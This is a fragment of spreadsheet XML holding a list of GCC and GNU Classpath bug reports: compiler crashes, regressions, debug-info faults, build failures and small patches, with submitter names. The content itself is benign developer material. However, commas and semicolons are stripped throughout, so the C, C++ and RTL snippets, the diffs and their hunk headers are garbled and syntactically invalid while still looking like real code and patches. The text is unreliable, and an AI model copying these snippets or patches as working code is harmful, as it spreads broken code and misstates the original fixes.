    return Func
}
----------------</t>
  </si>
  <si>
    <t>pss</t>
  </si>
  <si>
    <t>GCC-37145</t>
  </si>
  <si>
    <t>[4.4 Regression] XFAILs from PRE rewrite SCCVN union optimization disabled</t>
  </si>
  <si>
    <t>We still would have
FAIL: gcc.dg/tree-ssa/ssa-fre-7.c scan-tree-dump-times fre Inserted pretmp 1
FAIL: gcc.dg/tree-ssa/ssa-fre-7.c scan-tree-dump-times fre Replaced a.u.f with
pretmp 3
FAIL: gcc.dg/tree-ssa/ssa-fre-7.c scan-tree-dump-times fre Replaced a.u.k with
j 1
FAIL: gcc.dg/tree-ssa/ssa-fre-7.c scan-tree-dump fre =
VIEW_CONVERT_EXPR\\(j_
FAIL: gcc.dg/tree-ssa/ssa-fre-7.c scan-tree-dump optimized return j
FAIL: gcc.dg/tree-ssa/ssa-fre-8.c scan-tree-dump-times fre Replaced u.f with
pretmp 2
FAIL: gcc.dg/tree-ssa/ssa-fre-8.c scan-tree-dump-times fre Inserted pretmp 2
FAIL: gcc.dg/tree-ssa/ssa-fre-9.c scan-tree-dump-times fre Eliminated: 1 2
FAIL: gcc.dg/tree-ssa/ssa-fre-9.c scan-tree-dump-times fre Insertions: 1 2
FAIL: gcc.dg/tree-ssa/ssa-pre-15.c scan-tree-dump optimized = 0
but they were XFAILed with
URL: http://gcc.gnu.org/viewcvs?root=gcc&amp;view=rev&amp;rev=138005
Log:
2008-07-20  Daniel Berlin  
	* gcc.dg/tree-ssa/ssa-fre-7.c: XFAIL.
	* gcc.dg/tree-ssa/ssa-fre-8.c: Ditto.
	* gcc.dg/tree-ssa/ssa-fre-9.c: Ditto.
	* gcc.dg/tree-ssa/ssa-fre-13.c: Ditto.
	* gcc.dg/tree-ssa/ssa-fre-14.c: Ditto.
	* gcc.dg/tree-ssa/ssa-fre-17.c: Ditto.
	* gcc.dg/tree-ssa/ssa-pre-15.c: Ditto.
	* gcc.dg/tree-ssa/loadpre1.c: PASS.</t>
  </si>
  <si>
    <t>GCC-7968</t>
  </si>
  <si>
    <t>Internal error #19990916.</t>
  </si>
  <si>
    <t>$ g++ -v -save-temps -Wall test.cpp
Reading specs from /usr/lib/gcc-lib/i386-redhat-linux/2.96/specs
gcc version 2.96 20000731 (Red Hat Linux 7.0)
 /usr/lib/gcc-lib/i386-redhat-linux/2.96/cpp0 -lang-c++ -D__GNUG__=2 -v -D__GNUC
__=2 -D__GNUC_MINOR__=96 -D__GNUC_PATCHLEVEL__=0 -D__ELF__ -Dunix -Dlinux -D__EL
F__ -D__unix__ -D__linux__ -D__unix -D__linux -Asystem(posix) -Wall -Acpu(i386)
-Amachine(i386) -Di386 -D__i386 -D__i386__ -D__tune_i386__ test.cpp test.ii
GNU CPP version 2.96 20000731 (Red Hat Linux 7.0) (cpplib)
 (i386 Linux/ELF)
ignoring nonexistent directory /usr/i386-redhat-linux/include
#include ... search starts here:
#include  search starts here:
 /usr/include/g++-3
 /usr/local/include
 /usr/lib/gcc-lib/i386-redhat-linux/2.96/include
 /usr/include
End of search list.
 /usr/lib/gcc-lib/i386-redhat-linux/2.96/cc1plus test.ii -quiet -dumpbase test.c
pp -Wall -version -o test.s
GNU C++ version 2.96 20000731 (Red Hat Linux 7.0) (i386-redhat-linux) compiled b
y GNU C version 2.96 20000731 (Red Hat Linux 7.0).
test.cpp:44: parse error at end of input
test.cpp:44: Internal error #19990916.
test.cpp:44: Internal compiler error in poplevel at ../gcc/cp/decl.c:
1315
Please submit a full bug report.
See  for instructions.
Release:
GNU CPP version 2.96 20000731
Environment:
Red Hat Linux 7.0 (i386 Linux/ELF)
How-To-Repeat:
compile the code it will give the parse error at end of input</t>
  </si>
  <si>
    <t>prashkatti_2000</t>
  </si>
  <si>
    <t>GCC-6994</t>
  </si>
  <si>
    <t>[3.4 regression] ICE in find_function_data</t>
  </si>
  <si>
    <t>Compiler is aborting in find_function_data.
Release:
3.1.1 20020603 (prerelease)
Environment:
i386-suse-linux
How-To-Repeat:
$ gcc cube.ii
cube.ii: In constructor `Cube::Cube(float float float int int int)':
cube.ii:28238: Internal compiler error in find_function_data at function.c:329
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.</t>
  </si>
  <si>
    <t>GCC-11325</t>
  </si>
  <si>
    <t>[3.4 regression]  nested class debug info missing</t>
  </si>
  <si>
    <t>Sometime between 2003-02-16 and 2003-03-19 the following small code snipped
started to be un-debuggable. This is a nice small snippet abstracted from v3's
locale code.
namespace bug
{
  class outer
  {
  public:
    class inner
    static inner*  _S_
    inner*	   _M_
    outer()
    ~outer()
  }
  class outer::inner
  {
    typedef unsigned int size_t
  private:
    size_t				_M_references
    const void**			_M_facets
    size_t 				_M_facets_size
    char** 				_M_names
  }
  outer::outer()
  { _M_ = new outer::inner }
  outer::~outer()
  { delete _M_ }
}
int main()
{
  bug::outer loc
  return 0 // (gdb) p *loc._M_
}
What happens in gcc-3.2.x gcc-3.3.x:
(gdb) p *loc._M_
$2 = {
  _M_references = 0 
  _M_facets = 0x0 
  _M_facets_size = 0 
  _M_names = 0x0
}
What happens in gcc-head and gcc &gt; 20030319 is:
(gdb) p *loc._M_
$3 = 
Why you're getting cc'd: 
Perhaps you know what went wrong. Perhaps not: if so then please re-assign
this. Nathan in particular seems to have some heavy lifting work around
2003-02-20. If you've got pre-built cc1pluses it should be easy enough to
narrow down the date to a smaller range than what I've been able to do.
This is kind of a blocker for v3 but more of a sad bummer on an otherwise
depressing day. I can regress to a 2003-02-16 toolchain and work with that until
this is fixed without major problems. (In any case I spent much of the day
doing this.) Still it should probably get fixed.
best
benjamin</t>
  </si>
  <si>
    <t>GCC-44763</t>
  </si>
  <si>
    <t>[4.4/4.5 regression] SEGV in allocno_priority_compare_func on Solaris 8</t>
  </si>
  <si>
    <t>In a Solaris 8/x86 testsuite run several testcases fails with an ICE: a SEGV in
allocno_priority_compare_func.
An example is
FAIL: g++.old-deja/g++.bugs/900511_01.C (internal compiler error)
FAIL: g++.old-deja/g++.bugs/900511_01.C (test for excess errors)
WARNING: g++.old-deja/g++.bugs/900511_01.C compilation failed to produce executable
$ ./cc1plus 900511_01.ii
 struct_1::operator int() struct_2::operator float() void test() int main()
Analyzing compilation unit
Performing interprocedural optimizations
     Assembling functions:
 struct_1::operator int() struct_2::operator float() void test()
/vol/gcc/src/hg/trunk/solaris/gcc/testsuite/g++.old-deja/g++.bugs/900511_01.C: In function 'void test()':
/vol/gcc/src/hg/trunk/solaris/gcc/testsuite/g++.old-deja/g++.bugs/900511_01.C:41:1: internal compiler error: Segmentation Fault
In gdb I find this stacktrace:
Program received signal SIGSEGV Segmentation fault.
allocno_priority_compare_func (v1p=0x8d73c14 v2p=0x8d73c1c)
    at /vol/gcc/src/hg/trunk/solaris/gcc/ira-color.c:1750
1750      pri1 = allocno_priorities[ALLOCNO_NUM (a1)]
(gdb) where
#0  allocno_priority_compare_func (v1p=0x8d73c14 v2p=0x8d73c1c)
    at /vol/gcc/src/hg/trunk/solaris/gcc/ira-color.c:1750
#1  0xdfadbb3d in qsort () from /usr/lib/libc.so.1
#2  0x084a61b5 in fast_allocation ()
    at /vol/gcc/src/hg/trunk/solaris/gcc/ira-color.c:3260
#3  ira_color () at /vol/gcc/src/hg/trunk/solaris/gcc/ira-color.c:3325
#4  0x08491b88 in ira () at /vol/gcc/src/hg/trunk/solaris/gcc/ira.c:3278
#5  rest_of_handle_ira () at /vol/gcc/src/hg/trunk/solaris/gcc/ira.c:3433
#6  0x084f29a8 in execute_one_pass (pass=0x8c24a60)
    at /vol/gcc/src/hg/trunk/solaris/gcc/passes.c:1580
#7  0x084f2c89 in execute_pass_list (pass=0x8c24a60)
    at /vol/gcc/src/hg/trunk/solaris/gcc/passes.c:1635
#8  0x084f2c9c in execute_pass_list (pass=0x8cb0da0)
    at /vol/gcc/src/hg/trunk/solaris/gcc/passes.c:1636
#9  0x085f6382 in tree_rest_of_compilation (fndecl=0xdfa24b80)
    at /vol/gcc/src/hg/trunk/solaris/gcc/tree-optimize.c:420
#10 0x0879591d in cgraph_expand_function (node=0xdf992498)
    at /vol/gcc/src/hg/trunk/solaris/gcc/cgraphunit.c:1632
#11 0x08798c77 in cgraph_output_in_order ()
    at /vol/gcc/src/hg/trunk/solaris/gcc/cgraphunit.c:1805
#12 cgraph_optimize () at /vol/gcc/src/hg/trunk/solaris/gcc/cgraphunit.c:1962
#13 0x08798fff in cgraph_finalize_compilation_unit ()
    at /vol/gcc/src/hg/trunk/solaris/gcc/cgraphunit.c:1171
#14 0x08190a82 in cp_write_global_declarations ()
    at /vol/gcc/src/hg/trunk/solaris/gcc/cp/decl2.c:3924
#15 0x0859d74c in compile_file (argc=2 argv=0x80477c4)
    at /vol/gcc/src/hg/trunk/solaris/gcc/toplev.c:997
#16 do_compile (argc=2 argv=0x80477c4)
    at /vol/gcc/src/hg/trunk/solaris/gcc/toplev.c:2342
#17 toplev_main (argc=2 argv=0x80477c4)
    at /vol/gcc/src/hg/trunk/solaris/gcc/toplev.c:2383
#18 0x082c16cb in main (argc=2 argv=0x80477c4)
    at /vol/gcc/src/hg/trunk/solaris/gcc/main.c:35
This is almost certainly another case of PR bootstrap/43870 and
PR tree-optimization/42157.
Vladimir could you please have a look?
Thanks.
  Rainer</t>
  </si>
  <si>
    <t>GCC-63328</t>
  </si>
  <si>
    <t>c-c++-common/gomp/pr60823-3.c test fails with -fcompare-debug</t>
  </si>
  <si>
    <t>xgcc: error: /usr/src/gcc/gcc/testsuite/c-c++-common/gomp/pr60823-3.c: -fcompare-debug failure</t>
  </si>
  <si>
    <t>GCC-1564</t>
  </si>
  <si>
    <t>build problems</t>
  </si>
  <si>
    <t>I tried to build gcj from the latest gcc cvs sources according to
the instructions found at
http://sources.redhat.com/java/build-snapshot.html but ran into a
number of problems.
  1)  A check at gcc/tree.c:2428 failed because gcc/java/parse.y:1631
      used build1 for a nullary operator.
/softlab/robyn/src/gcc/build/gcc/gcj -B/softlab/robyn/src/gcc/build/i686-pc-linux-gnu/libjava/ -B/softlab/robyn/src/gcc/build/gcc/ --encoding=UTF-8 -C -L/softlab/robyn/src/gcc/build/i686-pc-linux-gnu/libjava -g -classpath /softlab/robyn/src/gcc/build/i686-pc-linux-gnu/libjava:/softlab/robyn/src/gcc/libjava -d /softlab/robyn/src/gcc/build/i686-pc-linux-gnu/libjava java/lang/ConcreteProcess.java
/softlab/robyn/src/gcc/libjava/java/io/ObjectInputStream.java:384: Internal compiler error in build1 at tree.c:2428
Please submit a full bug report.
 See  for instructions.
/softlab/robyn/src/gcc/build/gcc/gcj -B/softlab/robyn/src/gcc/build/i686-pc-linux-gnu/libjava/ -B/softlab/robyn/src/gcc/build/gcc/ --encoding=UTF-8 -C -L/softlab/robyn/src/gcc/build/i686-pc-linux-gnu/libjava -g -classpath /softlab/robyn/src/gcc/build/i686-pc-linux-gnu/libjava:/softlab/robyn/src/gcc/libjava -d /softlab/robyn/src/gcc/build/i686-pc-linux-gnu/libjava gnu/classpath/Configuration.java
/softlab/robyn/src/gcc/libjava/java/io/ObjectInputStream.java:384: Internal compiler error in build1 at tree.c:2428
Please submit a full bug report.
 See  for instructions.
make[3]: *** [java/lang/ConcreteProcess.class] Error 1
make[3]: Leaving directory `/softlab/robyn/src/gcc/build/i686-pc-linux-gnu/libjava'
make[2]: *** [libgcj.jar] Error 2
make[2]: Leaving directory `/softlab/robyn/src/gcc/build/i686-pc-linux-gnu/libjava'
make[1]: *** [all-target-libjava] Error 2
make[1]: Leaving directory `/softlab/robyn/src/gcc/build'
make: *** [bootstrap] Error 2
  2)  --tag GCJ (or CXX?) was not specified for C++ files at
      libjava/Makfile.in:1184 (?)
libtool: compile: unable to infer tagged configuration
libtool: compile: specify a tag with `--tag'
make[3]: *** [prims.lo] Error 1
make[3]: Leaving directory `/softlab/robyn/src/gcc/build/i686-pc-linux-gnu/libjava'
make[2]: *** [all-recursive] Error 1
make[2]: Leaving directory `/softlab/robyn/src/gcc/build/i686-pc-linux-gnu/libjava'
make[1]: *** [all-target-libjava] Error 2
make[1]: Leaving directory `/softlab/robyn/src/gcc/build'
make: *** [bootstrap] Error 2
  3)  The include path to vector in
      libjava/gnu/gcj/xlib/natClip.cc seems to be missing. I
      didn't had time to try to fix this.
../../../libjava/gnu/gcj/xlib/natClip.cc:15:18: vector: No such file or directory
../../../libjava/gnu/gcj/xlib/natClip.cc:26: syntax error before `' token
../../../libjava/gnu/gcj/xlib/natClip.cc: In member function `void 
   gnu::gcj::xlib::Clip::init(JArray*)':
../../../libjava/gnu/gcj/xlib/natClip.cc:33: `XRectVector' undeclared (first 
   use this function)
../../../libjava/gnu/gcj/xlib/natClip.cc:33: (Each undeclared identifier is 
   reported only once for each function it appears in.)
../../../libjava/gnu/gcj/xlib/natClip.cc:33: `xrectvector' undeclared (first 
   use this function)
../../../libjava/gnu/gcj/xlib/natClip.cc:33: parse error before `(' token
make[3]: *** [gnu/gcj/xlib/natClip.lo] Error 1
make[3]: Leaving directory `/softlab/robyn/src/gcc/build/i686-pc-linux-gnu/libjava'
make[2]: *** [all-recursive] Error 1
make[2]: Leaving directory `/softlab/robyn/src/gcc/build/i686-pc-linux-gnu/libjava'
make[1]: *** [all-target-libjava] Error 2
make[1]: Leaving directory `/softlab/robyn/src/gcc/build'
make: *** [bootstrap] Error 2
&gt; cvs -q diff -c3p 
Index: configure.in
===================================================================
RCS file: /cvs/gcc/gcc/configure.inv
retrieving revision 1.84
diff -c -3 -p -r1.84 configure.in
*** configure.in	2001/01/02 15:36:25	1.84
--- configure.in	2001/01/05 18:50:37
*************** case ${target} in
*** 739745 ****
      fi
    *-*-linux*)
!     noconfigdirs=${libgcj}
      # linux has rx in libc
      skipdirs=$skipdirs target-librx
--- 739745 ----
      fi
    *-*-linux*)
!     noconfigdirs=
      # linux has rx in libc
      skipdirs=$skipdirs target-librx
Index: gcc/java/parse.y
===================================================================
RCS file: /cvs/gcc/gcc/gcc/java/parse.yv
retrieving revision 1.238
diff -c -3 -p -r1.238 parse.y
*** parse.y	2000/12/18 21:23:02	1.238
--- parse.y	2001/01/05 18:50:40
*************** switch_label:
*** 16281634 ****
  		}
  |	DEFAULT_TK REL_CL_TK
  		{ 
! 		  tree lab = build1 (DEFAULT_EXPR NULL_TREE NULL_TREE)
  		  EXPR_WFL_LINECOL (lab) = $1.location
  		  java_method_add_stmt (current_function_decl lab)
  		}
--- 16281634 ----
  		}
  |	DEFAULT_TK REL_CL_TK
  		{ 
! 		  tree lab = build (DEFAULT_EXPR NULL_TREE NULL_TREE)
  		  EXPR_WFL_LINECOL (lab) = $1.location
  		  java_method_add_stmt (current_function_decl lab)
  		}
Index: libjava/Makefile.in
===================================================================
RCS file: /cvs/gcc/gcc/libjava/Makefile.inv
retrieving revision 1.131
diff -c -3 -p -r1.131 Makefile.in
*** Makefile.in	2000/12/30 12:22:15	1.131
--- Makefile.in	2001/01/05 18:50:41
*************** SCRIPTS =  $(bin_SCRIPTS)
*** 11811187 ****
  CXXFLAGS = @CXXFLAGS@
  CXXCOMPILE = $(CXX) $(DEFS) $(INCLUDES) $(AM_CPPFLAGS) $(CPPFLAGS) $(AM_CXXFLAGS) $(CXXFLAGS)
! LTCXXCOMPILE = $(LIBTOOL) --mode=compile $(CXX) $(DEFS) $(INCLUDES) $(AM_CPPFLAGS) $(CPPFLAGS) $(AM_CXXFLAGS) $(CXXFLAGS)
  CXXLD = $(CXX)
  CXXLINK = $(LIBTOOL) --mode=link $(CXXLD) $(AM_CXXFLAGS) $(CXXFLAGS) $(LDFLAGS) -o $@
  CFLAGS = @CFLAGS@
--- 11811187 ----
  CXXFLAGS = @CXXFLAGS@
  CXXCOMPILE = $(CXX) $(DEFS) $(INCLUDES) $(AM_CPPFLAGS) $(CPPFLAGS) $(AM_CXXFLAGS) $(CXXFLAGS)
! LTCXXCOMPILE = $(LIBTOOL) --tag=GCJ --mode=compile $(CXX) $(DEFS) $(INCLUDES) $(AM_CPPFLAGS) $(CPPFLAGS) $(AM_CXXFLAGS) $(CXXFLAGS)
  CXXLD = $(CXX)
  CXXLINK = $(LIBTOOL) --mode=link $(CXXLD) $(AM_CXXFLAGS) $(CXXFLAGS) $(LDFLAGS) -o $@
  CFLAGS = @CFLAGS@
Release:
current cvs source
Environment:
Debain unstable</t>
  </si>
  <si>
    <t>GCC-40265</t>
  </si>
  <si>
    <t>sh2a compiler ICEs in simplify_subreg at simplify-rtx.c:4960</t>
  </si>
  <si>
    <t>Newlib build fails during compiling libc/stdlib/ldtoa.c for m2a with
  internal compiler error: in simplify_subreg at simplify-rtx.c:4960
A reduced testcase is
void
foo (unsigned short *x unsigned short *y)
{
  unsigned short *p = x
  *y = 0
  if (*p++)
    *y = 0x8000
}
For m2a movrt insn is defined as
(define_insn movrt
  [(set (match_operand:SI 0 arith_reg_dest =r)
        (if_then_else (eq:SI (reg:SI T_REG) (const_int 0))
        (const_int 1)
        (const_int 0)))]
  TARGET_SH2A
  movrt\\t%0
   [(set_attr type arith)])
and now sh.c:sh_expand_t_scc generates this insn as an scc
instruction.  It seems that it's too complex as an scc insn
and confuses the combine phase.  I'm testing the patch below
which uses another movrt insn with more simple arithmetic
definition
(define_insn xorsi3_movrt
  [(set (match_operand:SI 0 arith_reg_dest =r)
	(xor:SI (reg:SI T_REG)
		(const_int 1)))]
  TARGET_SH2A
  movrt\\t%0
  [(set_attr type arith)])
diff -uprN ORIG/trunk/gcc/config/sh/sh.c trunk/gcc/config/sh/sh.c
--- ORIG/trunk/gcc/config/sh/sh.c	2009-05-25 08:19:47.000000000 +0900
+++ trunk/gcc/config/sh/sh.c	2009-05-27 07:32:14.000000000 +0900
@@ -110857 +110857 @@ sh_expand_t_scc (rtx operands[])
     emit_insn (gen_movt (result))
   else if (TARGET_SH2A &amp;&amp; ((code == EQ &amp;&amp; val == 0)
 			    || (code == NE &amp;&amp; val == 1)))
-    emit_insn (gen_movrt (result))
+    emit_insn (gen_xorsi3_movrt (result))
   else if ((code == EQ &amp;&amp; val == 0) || (code == NE &amp;&amp; val == 1))
     {
       emit_clobber (result)
diff -uprN ORIG/trunk/gcc/config/sh/sh.md trunk/gcc/config/sh/sh.md
--- ORIG/trunk/gcc/config/sh/sh.md	2009-05-19 10:49:14.000000000 +0900
+++ trunk/gcc/config/sh/sh.md	2009-05-27 07:32:14.000000000 +0900
@@ -910916 +91096 @@ mov.l\\t1fr0\\n\\
   movt	%0
   [(set_attr type arith)])
- complements the T bit and stores the result in a register
-(define_insn movrt
-  [(set (match_operand:SI 0 arith_reg_dest =r)
-        (if_then_else (eq:SI (reg:SI T_REG) (const_int 0))
-        (const_int 1)
-        (const_int 0)))]
-  TARGET_SH2A
-  movrt\\t%0
-   [(set_attr type arith)])
-
 (define_expand cstore4_media
   [(set (match_operand:SI 0 register_operand =r)
 	(match_operator:SI 1 sh_float_comparison_operator</t>
  </si>
  <si>
    <t>GCC-58882</t>
  </si>
  <si>
    <t>ICE with invalid C99 style designated initializers</t>
  </si>
  <si>
    <t>The following invalid code snippet triggers an ICE since GCC 4.7.0 (when C99 style designated initializers were introduced in the C++ front-end):
=============================
int a[] = { [0.] = 0 }
=============================
bug.cc:1:22: internal compiler error: in check_array_designated_initializer at cp/decl.c:4812
 int a[] = { [0.] = 0 }
                      ^
0x55aa63 check_array_designated_initializer
        ../../gcc/gcc/cp/decl.c:4812
0x562bbf reshape_init_array_1
        ../../gcc/gcc/cp/decl.c:5109
0x561c79 reshape_init(tree_node* tree_node* int)
        ../../gcc/gcc/cp/decl.c:5498
0x563cd3 check_initializer
        ../../gcc/gcc/cp/decl.c:5667
0x5766fc cp_finish_decl(tree_node* tree_node* bool tree_node* int)
        ../../gcc/gcc/cp/decl.c:6356
0x663f57 cp_parser_init_declarator
        ../../gcc/gcc/cp/parser.c:16652
0x66569f cp_parser_simple_declaration
        ../../gcc/gcc/cp/parser.c:11066
0x6495e0 cp_parser_block_declaration
        ../../gcc/gcc/cp/parser.c:10947
0x6708fe cp_parser_declaration
        ../../gcc/gcc/cp/parser.c:10844
0x66f61a cp_parser_declaration_seq_opt
        ../../gcc/gcc/cp/parser.c:10730
0x670f36 cp_parser_translation_unit
        ../../gcc/gcc/cp/parser.c:3990
0x670f36 c_parse_file()
        ../../gcc/gcc/cp/parser.c:30999
0x78e183 c_common_parse_file()
        ../../gcc/gcc/c-family/c-opts.c:1046
Please submit a full bug report [etc.]</t>
  </si>
  <si>
    <t>GCC-10518</t>
  </si>
  <si>
    <t>Re: [3.3 regression] 20020227-1.c:30: interna compiler error: in reload at reload1.c:1108 on hppa64-hp-hpux11.11</t>
  </si>
  <si>
    <t xml:space="preserve"> &gt; &gt;Category:       middle-end
 &gt; &gt;Synopsis:       [3.3 regression] 20020227-1.c:30: interna compiler error: in reload at reload1.c:1108 on hppa64-hp-hpux11.11
 &gt; &gt;Confidential:   no
 &gt; &gt;Severity:       serious
 &gt; &gt;Priority:       medium
 &gt; &gt;Class:          ice-on-legal-code
 &gt; &gt;Submitter-Id:   net
 &gt; &gt;Originator:     Dave Anglin
 &gt; &gt;Release:        gcc version 3.3 20030426 (prerelease)
 &gt; &gt;Environment:
 &gt; hppa64-hp-hpux11.11
 &gt; &gt;Description:
 &gt; At -O1 and above the following ICE occurs:
 &gt; 
 &gt; /xxx/gnu/gcc-3.3/gcc/gcc/testsuite/gcc.c-torture/execute/20020227-1.c: In functi
 &gt; on `f2':
 &gt; /xxx/gnu/gcc-3.3/gcc/gcc/testsuite/gcc.c-torture/execute/20020227-1.c:30: intern
 &gt; al compiler error: in reload at reload1.c:1108
 &gt; Please submit a full bug report
 &gt; There are two calls to find_reloads similar to the following:
 &gt; 
 &gt; Breakpoint 4 find_reloads (insn=0x800003fffee1c540 replace=0 ind_levels=0
 &gt;     live_known=0 reload_reg_p=0x294) at ../../gcc/gcc/reload.c:2512
 &gt; 2512      rtx set = single_set (insn)
 &gt; (gdb) p debug_rtx (insn)
 &gt; (insn 40 39 41 0 0000000000000000 (set (reg:SF 51 %fr23 [68])
 &gt;         (subreg:SF (reg:DI 20 %r20 [99]) 0)) 121 {*pa.md:3418} (insn_list 39 (ni
 &gt; l))
 &gt;     (nil))
 The subreg really looks invalid. It request upper halve of DImode
 register in SFmode format and as such it can not be represented
 I am confused by the support of complex numbers on pa64.  It looks like
 complex SFmode is hold in single integer or floating point register.
 For x86 we always do use two registers avoiding problems here.  Does
 complex numbers work at all on pa64?
 Honza
 &gt; &gt;How-To-Repeat:
 &gt; 
 &gt; &gt;Fix:
 &gt; 
 &gt; &gt;Unformatted:
Release:
unknown</t>
  </si>
  <si>
    <t>GCC-3862</t>
  </si>
  <si>
    <t>During the build process gccbug is installed using $(INSTALL_PROGRAM) instead of $(INSTALL_SCRIPT)</t>
  </si>
  <si>
    <t>While building gcc I tried passing INSTALL_PROGRAM_ARGS=-s to make in order to strip executables when they are installed.  The gccbug shell script is not an executable but it adds the -s option anyway so strip fails with an unknown format error.  It should not be trying to strip a shell script.  It tries because the line to install gccbug uses the $(INSTALL_PROGRAM) variable instead of the $(INSTALL_SCRIPT) variable.
Release:
gcc-3.0
Environment:
cygwin
How-To-Repeat:
after configuring gcc and making all use make install INSTALL_PROGRAM_ARGS=-s and it should fail when trying to install gccbug</t>
  </si>
  <si>
    <t>fenix</t>
  </si>
  <si>
    <t>GCC-63493</t>
  </si>
  <si>
    <t>libgo: write power64 version of reflect.MakeFunc</t>
  </si>
  <si>
    <t>For efficiency we should write a power64 version of reflect.MakeFunc.  This means writing makefunc_power64be.s makefunc_power64le.s makefuncgo_power64be.go and makefuncgo_power64le.go to implement the Power64 ABI calling convention along the lines of the existing implementations for 386 and amd64.  With the corresponding changes to MakeFunc makeMethodValue and makeValueMethod the reflect tests should continue to pass.</t>
  </si>
  <si>
    <t>GCC-71243</t>
  </si>
  <si>
    <t>Implicitly defined assignment operator is not constexpr even though it should be</t>
  </si>
  <si>
    <t>Explicitly defaulted constexpr assignment operator fails to compile.
See the minimal failing example below:
    struct S {
        constexpr S
    }
    int main() { }
Tested on debian (Testing) g++ v5.3.1-19.
The same applies to g++ v5.3.0 while it works with g++ v6.1.0 (tested on godbolt.org).
The error is:
    2 : error: explicitly defaulted function 'constexpr S&amp; S::operator=(const S&amp;)' cannot be declared as constexpr because the implicit declaration is not constexpr:
    constexpr S
    ^
    Compilation failed
According to 12.8p26 it should compile for the one implicitly defined ought to be constexpr too.</t>
  </si>
  <si>
    <t>michele.caini</t>
  </si>
  <si>
    <t>GCC-46883</t>
  </si>
  <si>
    <t>GCC ICE with  error: unrecognizable insn</t>
  </si>
  <si>
    <t>Created attachment 22704
testcase
Attached testcase when compiled with gcc trunk segfaults at O1/Os/O2 for arm
$ arm-oe-linux-gnueabi-gcc -O2 -S a.c
/net/isis/home/kraj/a.c: In function â€˜barâ€™:
/net/isis/home/kraj/a.c:11:1: error: unrecognizable insn:
(insn 149 93 97 4 /net/isis/home/kraj/a.c:9 (set (reg:SI 271)
        (and:SI (subreg:SI (mem:HI (post_inc:SI (reg:SI 248 [ ivtmp.42 ])) [2 S2 A16]) 0)
            (const_int 255 [0xff]))) -1 (expr_list:REG_INC (reg:SI 248 [ ivtmp.42 ])
        (nil)))
a.c:11:1: internal compiler error: in extract_insn at recog.c:2103
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
at Os/O1 it ICEs with 
 internal compiler error: in elimination_costs_in_insn at reload1.c:3639</t>
  </si>
  <si>
    <t>GCC-11508</t>
  </si>
  <si>
    <t>gcc does not output correct debuging file information for #included variables</t>
  </si>
  <si>
    <t>I have found a problem with printing source code lines for variable
declarations from inside gdb.   I think the problem is that gcc
stores the wrong file name information for the variable declarations
which come from #include but the problem *could* be gdb not handling
the information correctly.
What is interesting is that function line numbers *are* correctly handled.
Tested with gcc and g++: 2.95 2.96 3.3 on i386/i686 linux (debian and
redhat).  Most testing has been done with gcc 3.3.
I have tried various -g options like -gstabs -gstabs+ -gdwarf -gdwarf-2
none appear to help (some prevent gdb from finding variable line information
at all).
gcc -g test.c -o test1
gdb -q test1
===
(gdb) set listsize 3
(gdb) l foo
8
9       int foo
10
(gdb) l bar
2       #include test.h
3       #if zap
4       /* this */
(gdb) l func
5       int func(void)
6       {
7         return 23
===
You can see func is correctly displayed.
bar is located on line three of test.h if I move it around in test.h the
lines displayed from from test.c changes.
I don't understand the .stabs directives in the assembly output but it
seems like all global variables are put at the end of the output after
.stabs directives have said test.c is the current file and file information
is omitted.
I don't know of a work around for this problem.</t>
  </si>
  <si>
    <t>msimons</t>
  </si>
  <si>
    <t>GCC-20045</t>
  </si>
  <si>
    <t>gcc.dg/ia64-fptr-1.c fails on ia64-hpux</t>
  </si>
  <si>
    <t>The test gcc.dg/ia64-fptr-1.c fails on ia64-hpux.  Not a regression
relative to 3.4.x.
ld: Unsatisfied symbol _GLOBAL_OFFSET_TABLE_ in file /var/tmp//ccU3vrUt.o</t>
  </si>
  <si>
    <t>GCC-12014</t>
  </si>
  <si>
    <t>strcpy used with overlapping arguments</t>
  </si>
  <si>
    <t>I just ran bounds-checking on the gcc-3.3.1 release. It produced an error in 
adadecode.c. The problem is that it contains code like:
strcpy (ada_name ada_name + 5)
strcpy (tktoken tktoken + 2)
strcpy (ada_name + k + 1 ada_name + k + 2)
All of these strcpy's are illegal because the source and destination pointer
overlap.</t>
  </si>
  <si>
    <t>CLASSPATH-22889</t>
  </si>
  <si>
    <t>pangoft2 required even without cairo support</t>
  </si>
  <si>
    <t xml:space="preserve">Darwin complains about missing pangoft2 symbols during linking of gtk-peer. And some symbols are missing from libX11 which is not listed in LDFLAGS (and i don't know why).
This patch made it work.
Index: configure.ac
===================================================================
RCS file: /ahome/cacao/cacaocvs/cacao/src/classpath/configure.acv
retrieving revision 1.13
diff -u -3 -p -r1.13 configure.ac
--- configure.ac        28 Feb 2005 19:01:43 -0000      1.13
+++ configure.ac        7 Mar 2005 11:19:31 -0000
@@ -2548 +2548 @@ if test x${COMPILE_JNI} = xyes then
   if test x${enable_gtk_cairo} = xyes
   then
     PKG_CHECK_MODULES(CAIRO cairo)
-    PKG_CHECK_MODULES(PANGOFT2 pangoft2)
   fi
+  PKG_CHECK_MODULES(PANGOFT2 pangoft2)
   AC_SUBST(CAIRO_LIBS)
   AC_SUBST(CAIRO_CFLAGS)
   AC_SUBST(PANGOFT2_LIBS)
Index: Makefile.am
===================================================================
RCS file: /ahome/cacao/cacaocvs/cacao/src/classpath/native/jni/gtk-peer/Makefile.amv
retrieving revision 1.13
diff -u -3 -p -r1.13 Makefile.am
--- Makefile.am 5 Mar 2005 17:13:54 -0000       1.13
+++ Makefile.am 7 Mar 2005 11:20:58 -0000
@@ -5310 +5311 @@ libgtkpeer_la_SOURCES = $(gtk_cairo_c_so
 libgtkpeer_la_LIBADD = $(top_builddir)/native/jni/classpath/native_state.lo
-AM_LDFLAGS = @CLASSPATH_MODULE@ @GTK_LIBS@ @CAIRO_LIBS@ @PANGOFT2_LIBS@ @X_LIBS@ -lXtst
+AM_LDFLAGS = @CLASSPATH_MODULE@ @GTK_LIBS@ @CAIRO_LIBS@ @PANGOFT2_LIBS@ 
+             @X_PRE_LIBS@ @X_LIBS@ @X_EXTRA_LIBS@ -lX11 -lXtst
 AM_CPPFLAGS = @CLASSPATH_INCLUDES@
 # Just the WARNING_CFLAGS. We cannot use the strict flags since the gtk
 # headers contain broken prototypes (by design see gtkitemfactory.h).
 AM_CFLAGS = @WARNING_CFLAGS@ @ERROR_CFLAGS@ 
-            @GTK_CFLAGS@ @CAIRO_CFLAGS@ @PANGOFT2_CFLAGS@
+            @GTK_CFLAGS@ @CAIRO_CFLAGS@ @PANGOFT2_CFLAGS@ @X_CFLAGS@
</t>
  </si>
  <si>
